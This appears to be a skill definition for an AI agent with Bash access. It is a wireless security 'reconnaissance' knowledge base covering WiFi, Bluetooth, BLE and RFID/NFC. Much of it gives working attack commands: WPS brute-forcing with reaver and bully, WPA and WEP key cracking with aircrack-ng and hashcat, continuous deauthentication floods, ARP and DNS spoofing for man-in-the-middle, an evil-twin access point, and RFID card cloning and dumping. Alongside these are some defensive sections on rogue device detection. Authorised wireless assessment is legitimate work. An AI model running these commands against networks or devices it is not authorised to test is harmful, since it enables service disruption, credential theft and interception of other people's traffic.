| name | wireless-security |
| description | Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"reconnaissance","when_to_use":"wireless security, WiFi analysis, Bluetooth assessment, RFID, NFC, signal capture, protocol analysis, encryption testing, rogue device detection, wardriving, packet capture","tags":"wireless, wifi, bluetooth, rfid, nfc, signal-analysis, encryption-testing, wardriving, packet-capture, rogue-device","mitre_attack":"T1584, T1584.001, T1584.002, T1584.003, T1584.004"} |
Wireless Network Security Reconnaissance Knowledge Base
Wireless network security reconnaissance involves identifying, analyzing, and assessing wireless communication protocols and networks for vulnerabilities. This includes WiFi, Bluetooth, RFID/NFC, Zigbee, Z-Wave, LoRaWAN, and other wireless technologies.
1. WiFi Network Reconnaissance
Network Discovery
airodump-ng wlan0
airodump-ng -c 6 --bssid <BSSID> wlan0
wash -i wlan0 -C
Target Identification
airodump-ng wlan0
airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0
Client Identification
airodump-ng -c <channel> --bssid <BSSID> wlan0
aireplay-ng -0 10 -a <BSSID> -c <Client_MAC> wlan0
2. WiFi Encryption Analysis
Encryption Type Detection
airodump-ng -c <channel> -w scan --output-format csv wlan0
grep " WEP" scan-01.csv
if grep -q " WEP" scan-01.csv; then echo "WEP detected - vulnerable!"; fi
grep -E "WPA|WPA2" scan-01.csv
grep " OPN" scan-01.csv
Vulnerability Assessment
wash -i wlan0 -C
reaver -i wlan0 -b <BSSID> -vv
bully <BSSID> -c <channel> wlan0
hcxpcapngtool -o hash.hc22000 capture.cap
aireplay-ng -0 10 -a <BSSID> wlan0
Key Cracking
aircrack-ng -b <BSSID> capture.cap
aircrack-ng -w wordlist.txt -b <BSSID> capture.cap
hashcat -m 22000 hash.hc22000 wordlist.txt
3. Bluetooth Reconnaissance
Device Discovery
hcitool scan
bluetoothctl scan on
bluetoothctl devices
Service Discovery
sdptool browse <device_address>
rfcomm -a <device_address> list
Connection Attempts
bluetoothctl connect <device_address>
bluetoothctl trust <device_address>
bluetoothctl pair <device_address>
4. BLE (Bluetooth Low Energy) Analysis
BLE Device Discovery
hcitool lescan
bluetoothctl scan on
BLE Service Discovery
gatttool -b <device_address> -I   # interactive mode; type "connect" at the prompt
gatttool -b <device_address> --primary
gatttool -b <device_address> --characteristics
BLE Packet Capture
btmon
tshark -i bluetooth0 -Y "bluetooth.addr == <device_address>"
5. RFID and NFC Reconnaissance
RFID Analysis
rfidtool --read
rfidtool --clone --source <source_uid> --target <target_uid>
proxmark3> hf search
proxmark3> hf mf dump
NFC Analysis
nfc-list
nfc-poll
mfoc -O mf_dump.bin
nfc-mfultralight r nfc_dump.bin
strings nfc_dump.bin
6. Signal Analysis and Capture
Packet Capture
tcpdump -i wlan0 -n -w capture.pcap
tcpdump -i wlan0 -n port 53 -w dns_capture.pcap
tshark -i wlan0 -w wireless_capture.pcap
Spectrum Analysis
rtl_sdr -f 2412e6 -s 2e6 -g 20 output.raw
Note: RTL-SDR dongles tune only up to roughly 1.7 GHz, so a 2.4 GHz WiFi capture needs a wider-band SDR (e.g. HackRF or USRP); the command above shows the raw-capture syntax only.
Signal Strength Analysis
watch -n 1 "iwconfig wlan0 | grep Signal"
kismet
7. Rogue Device Detection
Rogue Access Point Detection
kismet
wifi-pumpkin -i wlan0
airodump-ng -c <channel> -w scan --output-format csv wlan0
grep -E "<known_SSID>|<known_BSSID>" scan-01.csv
Rogue Client Detection
airodump-ng -c <channel> -w scan --output-format csv wlan0
grep -v -f authorized_macs.txt scan-01.csv
grep -E "<known_MAC_prefixes>" scan-01.csv
8. Wireless Protocol Analysis
WiFi Protocol Analysis
tshark -i wlan0 -Y "wlan.fc.type == 0" -V
tshark -i wlan0 -Y "wlan.fc.type == 1" -V
tshark -i wlan0 -Y "wlan.fc.type == 2" -V
Bluetooth Protocol Analysis
tshark -i bluetooth0 -V
tshark -i bluetooth0 -Y "btatt" -V
9. Encryption Testing
WiFi Encryption Testing
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <My_MAC> wlan0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -e <ESSID> -a <BSSID> -h <My_MAC> wlan0
aircrack-ng -w wordlist.txt -b <BSSID> capture.cap
Bluetooth Encryption Testing
bluetoothctl info <device_address>
10. Advanced Wireless Attacks
Deauthentication Attacks
aireplay-ng -0 10 -a <BSSID> -c <Client_MAC> wlan0
aireplay-ng -0 10 -a <BSSID> wlan0
aireplay-ng -0 0 -a <BSSID> wlan0
MITM Attacks
arpspoof -i wlan0 -t <target_ip> -r <gateway_ip>
dnsspoof -i wlan0 "udp port 53"
Evil Twin Attack
airbase-ng -e <Fake_SSID> -c <channel> wlan0
11. Wireless Security Tools
WiFi Tools
aircrack-ng suite
wifite
kismet
Bluetooth Tools
bluetoothctl
rfcomm
sdptool
RFID/NFC Tools
rfidtool
libnfc tools
proxmark3-client
Tools Summary
| Tool | Purpose | Required |
|---|---|---|
| airodump-ng | WiFi packet capture | ✅ |
| aireplay-ng | WiFi packet injection | ✅ |
| aircrack-ng | WiFi encryption cracking | ✅ |
| wash | WPS detection | ✅ |
| reaver | WPS brute-force attack | ✅ |
| bully | WPS brute-force attack | ✅ |
| hcxpcapngtool | PMKID extraction | ✅ |
| hashcat | Password cracking | ✅ |
| hcitool | Bluetooth device scanning | ✅ |
| bluetoothctl | Bluetooth device management | ✅ |
| gatttool | BLE service discovery | ✅ |
| rfcomm | RFCOMM channel access | ✅ |
| sdptool | SDP service discovery | ✅ |
| tcpdump | Network packet capture | ✅ |
| tshark | Command-line protocol analysis | ✅ |
| kismet | Wireless network detector | ✅ |
| rtl_sdr | Software Defined Radio | ❌ |
| proxmark3 | RFID/NFC analysis | ❌ |
| wifite | Automated WiFi attacks | ✅ |